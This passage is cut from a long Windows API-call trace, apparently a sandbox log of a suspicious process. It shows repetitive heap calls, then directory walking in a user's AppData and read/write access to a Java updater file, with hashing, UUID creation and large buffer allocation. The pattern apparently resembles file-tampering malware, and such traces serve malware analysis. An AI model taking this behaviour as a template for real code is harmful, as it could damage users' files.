dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0098.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0098.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0098.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0098.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0098.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0098.104] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\") returned="Services\\" [0098.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0098.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317f0f8 [0098.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.104] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0098.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0098.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0098.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0098.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317f0f8 | out: hHeap=0x680000) returned 1 [0098.105] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0098.105] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0098.105] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0098.105] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0098.105] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0098.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0098.105] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0098.105] PathFindFileNameW (pszPath="") returned="" [0098.106] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0098.106] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0098.106] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\") returned="AU\\" [0098.106] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0098.107] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0098.107] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0098.107] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0098.107] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0098.107] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0098.107] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0098.107] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0098.107] PathFindFileNameW (pszPath="") returned="" [0098.108] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab") returned=".cab" [0098.108] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0098.109] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=581730) returned 1 [0098.109] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0098.112] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x8e03c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.112] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0098.246] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df668) returned 1 [0098.247] CryptCreateHash (in: hProv=0x6df668, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0098.247] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.247] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0098.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0098.247] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0098.247] GetLastError () returned 0x0 [0098.247] CryptDestroyHash (hHash=0x31c7580) returned 1 [0098.247] CryptReleaseContext (hProv=0x6df668, dwFlags=0x0) returned 1 [0098.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0098.247] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0098.247] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0098.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0098.247] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0098.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0098.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0098.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25810) returned 0x9a06a00 [0098.248] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0098.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0098.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0098.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) 